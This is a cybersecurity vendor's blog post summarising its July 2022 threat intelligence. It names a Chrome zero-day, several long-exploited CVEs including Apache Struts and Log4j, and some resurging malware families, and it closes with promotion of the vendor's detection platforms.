Amol Sarwate heads Fidelis and CloudPassage worldwide threat and security research lab responsible for Network, Endpoint and Cloud. He has devoted his career to protecting, securing, and educating... Read More
August 5, 2022
July 2022 Threat Intelligence Summary
The Latest Insights from the Fidelis Threat Research Team
The Fidelis Cybersecurity Threat Research Team’s latest report shows a shifting threat landscape that includes the resurgence of familiar threats, alongside new, widespread vulnerabilities in leading internet browsers that affected billions of users worldwide. Fidelis Cybersecurity provides continued coverage and vigilance on the most menacing threats and vulnerabilities, to keep your organization protected against current threats and allow you to stay ahead of whatever comes next.
A Zero-day Exploit Poses Threat to Billions Worldwide
CVE-2022-2294 marked the fourth zero-day hack against the Google Chrome browser in 2022. This high severity vulnerability has been exploited by malicious actors, targeting organizations with sophisticated spyware. While the exploit primarily targeted Chrome users, Microsoft and Apple patched the same flaw in their Edge and Safari browsers, respectively. Users of all three browsers are also urged to update their systems.
Each month presents a new set of challenges for cybersecurity defenders, as adversaries adapt existing threats and create new tactics and techniques. In July 2022, Fidelis Cybersecurity enabled clients to defend their networks and clouds from more than 276,155 high-severity malware threats, including ransomware, trojans, backdoors, exploit kits, loaders, and droppers. Additionally, Fidelis Cybersecurity helped customers fend off over 438 exploitation attempts across 20 distinct high-profile vulnerabilities.
Most Active Vulnerabilities
As usual, we see a lot of older vulnerabilities in our telemetry. This month, the predominant vulnerability tracked through our telemetry was a Remote Code Execution (RCE) vulnerability pertaining to Apache Struts (CVE-2018-11776). This vulnerability exists in the Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16. Other notable CVEs identified in Fidelis telemetry included CVE-2017-0199, which allows for arbitrary code execution on older, unpatched Windows Office and Server versions, and CVE-2021-44228, which is a continued Log4j2 issue. Exploits of these long-standing CVEs highlight the importance of real-time alerting and continual patching.
This month’s trending malware saw a resurgence of existing threats, including the vobfus family of worms, XoDdos and Gafgyd distributed denial of service (DDoS) malwares, and the Prometei multi-stage cryptocurrency botnet. While these are all older malware, they pose a high level of threat and can do significant damage to affected organizations. Be sure you have the latest information on how to detect and respond quickly so you can stay ahead of cyber adversaries.
About the Fidelis Cybersecurity Threat Research Team
The Threat Research team (TRT) at Fidelis Cybersecurity researches and analyzes the latest threats and issues. The intelligence we gather from multiple open-source and proprietary sources about our cyber adversaries’ tactics, techniques, and procedures (TTPs) is fed directly into our platforms, products, and services to help our customers detect, neutralize, and eliminate threats before they can harm production systems.
Visit the Fidelis Cybersecurity Threat Research page to read the complete July 2022 Threat Intelligence Summary, along with information on critical threats and resources to help you better prepare for the next attack.
See Fidelis platforms in action. Learn how our fast, scalable Fidelis Elevate and Fidelis CloudPassage Halo platforms provide deep insights into the SOC to help security teams worldwide protect, detect, respond, and neutralize even the most advanced cyber adversaries.